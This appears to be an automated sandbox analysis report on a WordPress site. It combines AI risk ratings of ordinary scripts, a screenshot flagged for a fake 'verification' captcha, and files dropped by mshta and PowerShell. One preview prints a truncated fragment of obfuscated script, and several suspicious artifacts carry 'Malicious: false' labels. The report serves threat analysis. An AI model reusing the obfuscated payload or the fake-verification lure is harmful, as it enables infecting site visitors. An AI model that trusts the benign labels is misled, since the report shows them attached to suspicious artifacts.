window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.cipassoitalia.it\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.0.9"}}; /! This file is auto-generated / !function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode,e=(p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0),i.toDataURL());return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p\|\|!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([129777,127995,8205,129778,127999],[129777,127995,8203,129778,127999])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything\|\|(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(e=t.source\|\|{}).concatemoji?c(e.concatemoji):e.wpemoji&&e.twemoji&&(c(e.twemoji),c(e.wpemoji)))}(window,document,window._wpemojiSettings);
URL: https://www.cipassoitalia.it/wp-includes/js/jquery... Model: Joe Sandbox AI	{ "risk_score": 2, "reasoning": "The provided JavaScript snippet appears to be a part of the jQuery Migrate plugin, which is a utility that helps developers migrate their jQuery-based code from older versions to newer versions of jQuery. The script does not contain any high-risk indicators, such as dynamic code execution, data exfiltration, or redirects to malicious domains. The script primarily focuses on providing compatibility and deprecation warnings for certain jQuery functions and features, which is a common practice in library development. While the script uses some legacy APIs like `XDomainRequest`, these are not inherently malicious and are used in a transparent manner. Overall, the script appears to be a legitimate part of the jQuery Migrate plugin and poses a low risk." }
/! jQuery Migrate v3.3.2 \| (c) OpenJS Foundation and other contributors \| jquery.org/license / "undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){return t(e,window)}):"object"==typeof module&&module.exports?module.exports=t(require("jquery"),window):t(jQuery,window)}(function(s,n){"use strict";function e(e){return 0<=function(e,t){for(var r=/^(\d+)\.(\d+)\.(\d+)/,n=r.exec(e)\|\|[],o=r.exec(t)\|\|[],i=1;i<=3;i++){if(+o[i]<+n[i])return 1;if(+n[i]<+o[i])return-1}return 0}(s.fn.jquery,e)}s.migrateVersion="3.3.2",n.console&&n.console.log&&(s&&e("3.0.0")\|\|n.console.log("JQMIGRATE: jQuery 3.0.0+ REQUIRED"),s.migrateWarnings&&n.console.log("JQMIGRATE: Migrate plugin loaded multiple times"),n.console.log("JQMIGRATE: Migrate is installed"+(s.migrateMute?"":" with logging active")+", version "+s.migrateVersion));var r={};function u(e){var t=n.console;s.migrateDeduplicateWarnings&&r[e]\|\|(r[e]=!0,s.migrateWarnings.push(e),t&&t.warn&&!s.migrateMute&&(t.warn("JQMIGRATE: "+e),s.migrateTrace&&t.trace&&t.trace()))}function t(e,t,r,n){Object.defineProperty(e,t,{configurable:!0,enumerable:!0,get:function(){return u(n),r},set:function(e){u(n),r=e}})}function o(e,t,r,n){e[t]=function(){return u(n),r.apply(this,arguments)}}s.migrateDeduplicateWarnings=!0,s.migrateWarnings=[],void 0===s.migrateTrace&&(s.migrateTrace=!0),s.migrateReset=function(){r={},s.migrateWarnings.length=0},"BackCompat"===n.document.compatMode&&u("jQuery is not compatible with Quirks Mode");var i,a,c,d={},l=s.fn.init,p=s.find,f=/\[(\s[-\w]+\s)([~\|^$]?=)\s([-\w#]?#[-\w#])\s\]/,y=/\[(\s[-\w]+\s)([~\|^$]?=)\s([-\w#]?#[-\w#])\s\]/g,m=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g;for(i in s.fn.init=function(e){var t=Array.prototype.slice.call(arguments);return"string"==typeof e&&"#"===e&&(u("jQuery( '#' ) is not a valid selector"),t[0]=[]),l.apply(this,t)},s.fn.init.prototype=s.fn,s.find=function(t){var r=Array.prototype.slice.call(arguments);if("string"==typeof t&&f.test(t))try{n.document.querySelector(t)}catch(e){t=t.replace(y,function(e,t,r,n){return"["+t+r+'"'+n+'"]'});try{n.document.querySelector(t),u("Attribute selector with '#' must be quoted: "+r[0]),r[0]=t}catch(e){u("Attribute selector with '#' was not fixed: "+r[0])}}return p.apply(this,r)},p)Object.prototype.hasOwnProperty.call(p,i)&&(s.find[i]=p[i]);o(s.fn,"size",function(){return this.length},"jQuery.fn.size() is deprecated and removed; use the .length property"),o(s,"parseJSON",function(){return JSON.parse.apply(null,arguments)},"jQuery.parseJSON is deprecated; use JSON.parse"),o(s,"holdReady",s.holdReady,"jQuery.holdReady is deprecated"),o(s,"unique",s.uniqueSort,"jQuery.unique is deprecated; use jQuery.uniqueSort"),t(s.expr,"filters",s.expr.pseudos,"jQuery.expr.filters is deprecated; use jQuery.expr.pseudos"),t(s.expr,":",s.expr.pseudos,"jQuery.expr[':'] is deprecated; use jQuery.expr.pseudos"),e("3.1.1")&&o(s,"trim",function(e){return null==e?"":(e+"").replace(m,"")},"jQuery.trim is deprecated; use String.prototype.trim"),e("3.2.0")&&(o(s,"nodeName",function(e,t){return e.nodeName&&e.nodeName.toLowerCase()===t.toLowerCase()},"jQuery.nodeName is deprecated"),o(s,"isArray",Array.isArray,"jQuery.isArray is deprecated; use Array.isArray")),e("3.3.0")&&(o(s,"isNumeric",function(e){var t=typeof e;return("number"==t\|\|"string"==t)&&!isNaN(e-parseFloat(e))},"jQuery.isNumeric() is deprecated"),s.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){d["[object "+t+"]"]=t.toLowerCase()}),o(s,"type",function(e){return null==e?e+"":"object"==typeof e\|\|"function"==typeof e?d[Object.prototype.toString.call(e)]\|\|"object":typeof e},"jQuery.type is deprecated"),o(s,"isFunction",function(e){return"function"==typeof e},"jQuery.isFunction() is deprecated"),o(s,"isWindow",function(e){return null!=e&&e===e.window},"jQuery.isWindow() is deprecated")),s.ajax&&(a=s.ajax,c=/(=)\?(?=&\|$)\|\?\?/,s.a
URL: https://www.cipassoitalia.it/wp-content/themes/enf... Model: Joe Sandbox AI	{ "risk_score": 2, "reasoning": "The provided JavaScript snippet appears to be a legitimate and benign script that enhances the functionality of a website. It primarily focuses on initializing and activating various jQuery-based plugins and scripts, such as parallax scrolling, video sections, accordion menus, and other common web development features. There are no indications of high-risk behaviors like dynamic code execution, data exfiltration, or suspicious redirects. The script seems to be part of a larger web application framework or theme, and its purpose is to provide a smooth and interactive user experience. Overall, the risk score is low, as the script demonstrates typical web development practices without any obvious malicious intent." }
(function($) { "use strict"; $(document).ready(function() { //global variables that are used on several ocassions $.avia_utilities = $.avia_utilities \|\| {}; if( /Android\|webOS\|iPhone\|iPad\|iPod\|BlackBerry\|IEMobile\|Opera Mini/i.test(navigator.userAgent) && 'ontouchstart' in document.documentElement) { $.avia_utilities.isMobile = true; } else { $.avia_utilities.isMobile = false; } //activate fixed bg fallback for mobile if($.fn.avia_mobile_fixed) $('.avia-bg-style-fixed').avia_mobile_fixed(); //activate parallax scrolling for backgrounds. if($.fn.avia_parallax) $('.av-parallax').avia_parallax(); //calculate the browser height and append a css rule to the head if($.fn.avia_browser_height) $('.av-minimum-height, .avia-fullscreen-slider, .av-cell-min-height').avia_browser_height(); //calculate the height of each video section if($.fn.avia_video_section) $('.av-section-with-video-bg').avia_video_section(); //creates team social icon tooltip new $.AviaTooltip({'class': "avia-tooltip", data: "avia-tooltip", delay:0, scope: "body"}); //creates icon element tooltip new $.AviaTooltip({'class': "avia-tooltip avia-icon-tooltip", data: "avia-icon-tooltip", delay:0, scope: "body"}); $.avia_utilities.activate_shortcode_scripts(); //layer slider height helper if($.fn.layer_slider_height_helper) $('.avia-layerslider').layer_slider_height_helper(); //"ajax" portfolio if($.fn.avia_portfolio_preview) { $('.grid-links-ajax').avia_portfolio_preview(); } // actiavte the masonry script: sorting/loading/etc if($.fn.avia_masonry) $('.av-masonry').avia_masonry(); //activate the accordion if($.fn.aviaccordion) $('.aviaccordion').aviaccordion(); //activate the accordion if($.fn.avia_textrotator) $('.av-rotator-container').avia_textrotator(); //activates the tab section shortcode if($.fn.avia_sc_tab_section) { $('.av-tab-section-container').avia_sc_tab_section(); } //activates the hor gallery shortcode if($.fn.avia_hor_gallery) { $('.av-horizontal-gallery').avia_hor_gallery(); } // activate columns and cells with a link if($.fn.avia_link_column) { $('.avia-link-column').avia_link_column(); } if($.fn.avia_delayed_animation_in_container) { $('.av-animation-delay-container').avia_delayed_animation_in_container(); } }); // ------------------------------------------------------------------------------------------- // ACTIVATE ALL SHORTCODES // ------------------------------------------------------------------------------------------- $.avia_utilities = $.avia_utilities \|\| {}; $.avia_utilities.activate_shortcode_scripts = function(container) { if(typeof container == 'undefined'){ container = 'body';} //activates the form shortcode if($.fn.avia_ajax_form) { $('.avia_ajax_form:not( .avia-disable-default-ajax )', container).avia_ajax_form(); } activate_waypoints(container); //activate the video api if($.fn.aviaVideoApi) { $('.avia-slideshow iframe[src*="youtube.com"], .av_youtube_frame, .av_vimeo_frame, .avia-slideshow video').aviaVideoApi({}, 'li'); } //activates the toggle shortcode if($.fn.avia_sc_toggle) { $('.togglecontainer', container).avia_sc_toggle(); } //activates the tabs shortcode if($.fn.avia_sc_tabs) { $('.top_tab', container).avia_sc_tabs(); $('.sidebar_tab', container).avia_sc_tabs({sidebar:true}); } //activates behavior and animation for gallery if($.fn.avia_sc_gallery) { $('.avia-gallery', container).avia_sc_gallery(); } //activates animated number shortcode if($.fn.avia_sc_animated_number) { $('.avia-animated-number', container).avia_sc_animated_number(); } //animation for elements that are not conne
URL: https://www.cipassoitalia.it/wp-content/plugins/co... Model: Joe Sandbox AI	{ "risk_score": 3, "reasoning": "The provided JavaScript snippet appears to be a cookie management utility that is commonly used in web applications to handle cookie-related functionality. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or redirects to malicious domains. The code primarily focuses on setting, reading, and deleting cookies, which is a standard practice for web applications. While it uses some legacy APIs like `XDomainRequest`, these pose minor risks and are not inherently malicious. Overall, the script seems to be a legitimate implementation of cookie management functionality and is considered low risk." }
CLI_ACCEPT_COOKIE_NAME = (typeof CLI_ACCEPT_COOKIE_NAME !== 'undefined' ? CLI_ACCEPT_COOKIE_NAME : 'viewed_cookie_policy'); CLI_PREFERNCE_COOKIE = (typeof CLI_PREFERNCE_COOKIE !== 'undefined' ? CLI_PREFERNCE_COOKIE : 'CookieLawInfoConsent'); CLI_ACCEPT_COOKIE_EXPIRE = (typeof CLI_ACCEPT_COOKIE_EXPIRE !== 'undefined' ? CLI_ACCEPT_COOKIE_EXPIRE : 365); CLI_COOKIEBAR_AS_POPUP = (typeof CLI_COOKIEBAR_AS_POPUP !== 'undefined' ? CLI_COOKIEBAR_AS_POPUP : false); var CLI_Cookie = { set: function (name, value, days) { var secure = ""; if (true === Boolean(Cli_Data.secure_cookies)) { secure = ";secure"; } if (days) { var date = new Date(); date.setTime(date.getTime() + (days * 24 * 60 * 60 * 1000)); var expires = "; expires=" + date.toGMTString(); } else { var expires = ""; } document.cookie = name + "=" + value + secure + expires + "; path=/"; if (days < 1) { host_name = window.location.hostname; document.cookie = name + "=" + value + expires + "; path=/; domain=." + host_name + ";"; if (host_name.indexOf("www") != 1) { var host_name_withoutwww = host_name.replace('www', ''); document.cookie = name + "=" + value + secure + expires + "; path=/; domain=" + host_name_withoutwww + ";"; } host_name = host_name.substring(host_name.lastIndexOf(".", host_name.lastIndexOf(".") - 1)); document.cookie = name + "=" + value + secure + expires + "; path=/; domain=" + host_name + ";"; } }, read: function (name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for (var i = 0; i < ca.length; i++) { var c = ca[i]; while (c.charAt(0) == ' ') { c = c.substring(1, c.length); } if (c.indexOf(nameEQ) === 0) { return c.substring(nameEQ.length, c.length); } } return null; }, erase: function (name) { this.set(name, "", -10); }, exists: function (name) { return (this.read(name) !== null); }, getallcookies: function () { var pairs = document.cookie.split(";"); var cookieslist = {}; for (var i = 0; i < pairs.length; i++) { var pair = pairs[i].split("="); cookieslist[(pair[0] + '').trim()] = unescape(pair[1]); } return cookieslist; } } var CLI = { bar_config: {}, showagain_config: {}, allowedCategories: [], js_blocking_enabled: false, set: function (args) { if (typeof JSON.parse !== "function") { console.log("CookieLawInfo requires JSON.parse but your browser doesn't support it"); return; } if (typeof args.settings !== 'object') { this.settings = JSON.parse(args.settings); } else { this.settings = args.settings; } this.js_blocking_enabled = Boolean(Cli_Data.js_blocking); this.settings = args.settings; this.bar_elm = jQuery(this.settings.notify_div_id); this.showagain_elm = jQuery(this.settings.showagain_div_id); this.settingsModal = jQuery('#cliSettingsPopup'); /* buttons */ this.main_button = jQuery('.cli-plugin-main-button'); this.main_link = jQuery('.cli-plugin-main-link'); this.reject_link = jQuery('.cookie_action_close_header_reject'); this.delete_link = jQuery(".cookielawinfo-cookie-delete"); this.settings_button = jQuery('.cli_settings_button'); this.accept_all_button = jQuery('.wt-cli-accept-all-btn'); if (this.settings.cookie_bar_as == 'popup') { CLI_COOKIEBAR_AS_POPUP = true; } this.mayBeSetPreferenceCookie(); this.addStyleAttribute(); this.configBar(); this.toggleBar(); this.attachDelete(); this.attachEvents(); this.configButtons(); this.reviewConsent(); var cli_hidebar_on_readmore = this.hideBarInReadMoreLink(); if (Boolean(this.settings.scroll_close) === true && cli_hidebar_on_readmore === false) { window.addEventListener("scroll", CLI.closeOnScroll, false); } }, hideBarInReadMoreLink: function () { if (Boolean(CLI.settings.button_2_hidebar) === true && this.main_link.length > 0 && this.main_link.hasClass('cli-minimize-bar')) { this.hideHeader(); cliBlocker.cookieBar(false); this.showagain_elm.slideDown(this.settings.animate_
URL: https://www.cipassoitalia.it/wp-content/themes/enf... Model: Joe Sandbox AI	{ "risk_score": 2, "reasoning": "The provided JavaScript snippet appears to be a legitimate part of a website's functionality, with no clear indicators of malicious intent. It primarily handles browser detection, mobile device handling, and various UI-related features such as the hamburger menu, scroll-to-top button, and lightbox functionality. While it uses some legacy APIs like `XDomainRequest`, these are not inherently malicious and are likely used for compatibility reasons. Overall, the script demonstrates typical website enhancement behaviors without any high-risk indicators." }
(function($) { "use strict"; $(document).ready(function() { var aviabodyclasses = AviaBrowserDetection('html'); $.avia_utilities = $.avia_utilities \|\| {}; if( /Android\|webOS\|iPhone\|iPad\|iPod\|BlackBerry\|IEMobile\|Opera Mini/i.test(navigator.userAgent) && 'ontouchstart' in document.documentElement) { $.avia_utilities.isMobile = true; } else { $.avia_utilities.isMobile = false; } //activates the hamburger mobile menu avia_hamburger_menu(); //show scroll top but1ton avia_scroll_top_fade(); //calculate width of content aviaCalcContentWidth(); //creates search tooltip new $.AviaTooltip({"class": 'avia-search-tooltip',data: 'avia-search-tooltip', event:'click', position:'bottom', scope: "body", attach:'element', within_screen: true}); //creates relate posts tooltip new $.AviaTooltip({"class": 'avia-related-tooltip', data: 'avia-related-tooltip', scope: ".related_posts, .av-share-box", attach:'element', delay:0}); //creates ajax search new $.AviaAjaxSearch({scope:'#header, .avia_search_element'}); // actiavte portfolio sorting if($.fn.avia_iso_sort) $('.grid-sort-container').avia_iso_sort(); // Checks height of content and sidebar and applies shadow class to the higher one AviaSidebarShaowHelper(); $.avia_utilities.avia_ajax_call(); }); $.avia_utilities = $.avia_utilities \|\| {}; $.avia_utilities.avia_ajax_call = function(container) { if(typeof container == 'undefined'){ container = 'body';}; $('a.avianolink').on('click', function(e){ e.preventDefault(); }); $('a.aviablank').attr('target', '_blank'); //activates the prettyphoto lightbox if($.fn.avia_activate_lightbox){ $(container).avia_activate_lightbox(); } //scrollspy for main menu. must be located before smoothscrolling if($.fn.avia_scrollspy) { if(container == 'body') { $('body').avia_scrollspy({target:'.main_menu .menu li > a'}); } else { $('body').avia_scrollspy('refresh'); } } //smooth scrooling if($.fn.avia_smoothscroll) $('a[href="#"]', container).avia_smoothscroll(container); avia_small_fixes(container); avia_hover_effect(container); avia_iframe_fix(container); //activate html5 video player if($.fn.avia_html5_activation && $.fn.mediaelementplayer) $(".avia_video, .avia_audio", container).avia_html5_activation({ratio:'16:9'}); } // ------------------------------------------------------------------------------------------- // Error log helper // ------------------------------------------------------------------------------------------- $.avia_utilities.log = function(text, type, extra) { if(typeof console == 'undefined'){return;} if(typeof type == 'undefined'){type = "log"} type = "AVIA-" + type.toUpperCase(); console.log("["+type+"] "+text); if(typeof extra != 'undefined') console.log(extra); } // ------------------------------------------------------------------------------------------- // keep track of the browser and content width // ------------------------------------------------------------------------------------------- function aviaCalcContentWidth() { var win = $(window), width_select= $('html').is('.html_header_sidebar') ? "#main" : "#header", outer = $(width_select), outerParent = outer.parents('div:eq(0)'), the_main = $(width_select + ' .container:first'), css_block = "", calc_dimensions = function() { var css = "", w_12 = Math.round( the_main.width() ), w_outer = Math.round( outer.width() ), w_inner = Math.round( outerParent.width() ); //css rules for mega menu css += " #header .three.units{width:" + ( w_12 0.25)+ "px;}"; css += " #header .six.units{width:" + ( w_12 * 0.50)+ "px;}"; css += " #header .nine.units
URL: https://www.cipassoitalia.it/wp-includes/js/jquery... Model: Joe Sandbox AI	```json { "risk_score": 1, "reasoning": "The script is a standard jQuery library snippet, which is widely used and trusted. It does not exhibit any high-risk or moderate-risk behaviors such as dynamic code execution, data exfiltration, or redirects to suspicious domains. The script is not obfuscated and does not interact with external domains in a suspicious manner. It primarily consists of utility functions and object manipulations typical of a library. Therefore, it is considered low risk." }
/! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license / !function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e\|\|"function"==typeof e?n[o.call(e)]\|\|"object":typeof e}var f="3.6.0",S=function(e,t){return new S.fn.init(e,t)};function p(e){var t=!!e&&"length"in e&&e.length,n=w(e);return!m(e)&&!x(e)&&("array"===n\|\|0===t\|\|"number"==typeof t&&0<t&&t-1 in e)}S.fn=S.prototype={jquery:f,constructor:S,length:0,toArray:function(){return s.call(this)},get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this.pushStack(s.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(S.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(S.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this.prevObject\|\|this.constructor()},push:u,sort:t.sort,splice:t.splice},S.extend=S.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]\|\|{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]\|\|{},s++),"object"==typeof a\|\|m(a)\|\|(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)r=e[t],"__proto__"!==t&&a!==r&&(l&&r&&(S.isPlainObject(r)\|\|(i=Array.isArray(r)))?(n=a[t],o=i&&!Array.isArray(n)?[]:i\|\|S.isPlainObject(n)?n:{},i=!1,a[t]=S.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},S.extend({expando:"jQuery"+(f+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e\|\|"[object Object]"!==o.call(e))&&(!(t=r(e))\|\|"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.nonce},n)},each:function(e,t){var n,r=0;if(p(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},makeArray:function(e,t){var n=t\|\|[];return null!=e&&(p(Object(e))?S.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){var r,i,o=0,a=[];if(p(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&a.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&a.push(i);return g(a)},guid:1,support:y}),"function"==typeof Symbol&&(S.fn[Symbol.iterator]=t[Symbol.iterator]),S.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){n["[object "+t+"]"]=t.toLowerCase()});var d=function(n){var e,d,b,o,i,h,f,g,w,u,l,T,C,a,E,v,s,c,y,S="s
URL: https://www.cipassoitalia.it/ Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Complete these Verification Steps", "prominent_button_name": "VERIFY", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": true, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://www.cipassoitalia.it/ Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }

Process:	C:\Windows\System32\mshta.exe
File Type:	data
Category:	dropped
Size (bytes):	2121184
Entropy (8bit):	4.141726508670004
Encrypted:	false
SSDEEP:	24576:ErQXI8kx1imSWrQbrQrjrx7wbrBL/WDrxeBrfal8rnF:hnPfwd7irWJeBalOF
MD5:	27E6BC5C0F3984CC4BCDAEFDB8EE8A09
SHA1:	E54AFC1198073A445546C3FC45DD15D4135D0A17
SHA-256:	7C1BBC910FA463008BEA97B7E7A636869D9D3C8AB0F065014C307259CC0A0334
SHA-512:	0DB90EB5633738DA20A874E38CC102C759193ECA844FDEB661CC61DA20B1DD4E75BB4FE738CB0040CB877AD4EFC3DB04278ABF1C46FCF288ECD7A0F7B725B5EF
Malicious:	false
Reputation:	low
Preview:	66B75M6el63e74k69n6fV6ey20C61F45U54h70A72W28P48A6bo54D61b72D29X7bD76g61Z72S20C5aG6bS43i68L67F3dt20S27j27p3bN66z6fY72w20t28p76J61Y72C20P4ca49k62x49L6aq20B3dR20k30x3bj4cy49f62L49M6ai20g3cC20Q48r6bz54a61P72R2eg6cC65B6eQ67G74h68N3bN20e4cd49K62s49R6aJ2bH2br29J7bo76I61U72z20r71h55n4cM41O47N20m3dt20h53C74o72L69T6eR67I2ep66l72K6fC6dj43V68T61B72B43T6fQ64W65v28Y48h6bL54S61u72R5bo4cU49N62E49s6aU5db20T2dx20b37V38h37y29r3by5aC6bY43d68G67k20d3dY20f5am6bs43x68q67q20V2bz20q71W55Q4cB41c47o7dc72h65S74h75I72C6eV20a5af6bm43S68f67w7dW3bJ76i61L72J20n5aQ6bp43b68M67u20e3dk20y61y45k54z70Q72w28P5bK38a38r36L2cZ38c39b36C2cF38G38F37f2cL38u33z33q2cI38L38G38O2cM39y30A37U2cX38C38Y38D2cX38p31g39W2cV38P33m34v2cR38W38l36h2cL38N31k39U2cG39P30T32q2cy39I30c33n2cJ38i38C34L2cZ39W30o31X2cD39X30f33P2ca38j31K39v2cH38D39Y39l2cZ38Z39C38y2cO39f30O36H2ci38i38F38P2cN39s30M31m2cM39a30W32v2ci38O39d31n2ci38U38u38X2cF38Y39i35v2cj38r39N35k2cf38E31w39t2cI38g33o32V2cS39P30B36h2cW38X31i39h2cg38c33C36L2cv38O31Q39t2cl38q33C32K2cz38J35f36W2ce3

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	12584
Entropy (8bit):	4.905392021155998
Encrypted:	false
SSDEEP:	384:brib4Z1VoGIpN6KQkj2qkjh4iUxCdjT6Ypib47:bL1V3IpNBQkj2Ph4iUxCdX6YP
MD5:	3A797BB89F31B1A6A41B9531C27450B4
SHA1:	F88C7BA1622656BA69E2041EED645AE4182A06B4
SHA-256:	09DB28EA3982D7E071A8383057146C78F2C71D9FED8CCEC309DE9E1CA01108A4
SHA-512:	C09328F9B63B831A6906AFE695581083F5AE3858825E5A8AB6E7698F604C25C19338CB80E32D0F0756C875DE8F20CD5A577C1B967D9B1513CF39832D4AA7F8E5
Malicious:	false
Reputation:	low
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	14516
Entropy (8bit):	5.45209012009061
Encrypted:	false
SSDEEP:	384:K8ijr3WMuSg8mVL7pvVT6X5qaJrBqeSAJk5T+fUp4el:rwrGMy8mt7qX5qa1se6WUpJ
MD5:	06672123763C4407FE2CDDDA25BAEBEF
SHA1:	1BFC358A541990A77ED512A42947DA45BF4FE921
SHA-256:	5382DB24AB447336B9BEB18F445361C6FDD774858E0FEBBBA85C06C6AF79B8A6
SHA-512:	CB33F8F76FA3DDBAD01E8C6C74977CDA4DDF394D059315B965885C0B9BDAE2C104F8F13093826CB89817DC8BEFC028C77B6957851AB8312FED8716DA11AB16CD
Malicious:	false
Reputation:	low
Preview:	@...e................................................@..........H...............o..b~.D.poM...%..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.............System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.................%...K... ...........System.Xml..@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementD....................+.H..!...e........System.Configuration.Ins

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 9 11:19:08 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.978906182579038
Encrypted:	false
SSDEEP:	48:885QdhTJZxHjidAKZdA1FehwiZUklqehry+3:88Q/f8y
MD5:	75BF6C3CE5E5957EE51B44E4CD54964D
SHA1:	C12AA9178590670335B458016FF596E6F5D246FC
SHA-256:	CB7E5593A21E5839B5FD7C18262A24705BA8F7F10B00ABF01E2B2783CE6A9CB7
SHA-512:	9B620D2C1E0C6B354F7C7983D2BFCCBEF680BF7FF4B16E61E019A795E48CDE08D3EA235547B59A2A81DCF8CD224DE97045A58962C62DCD1AC79DEF89055A220A
Malicious:	false
Reputation:	low
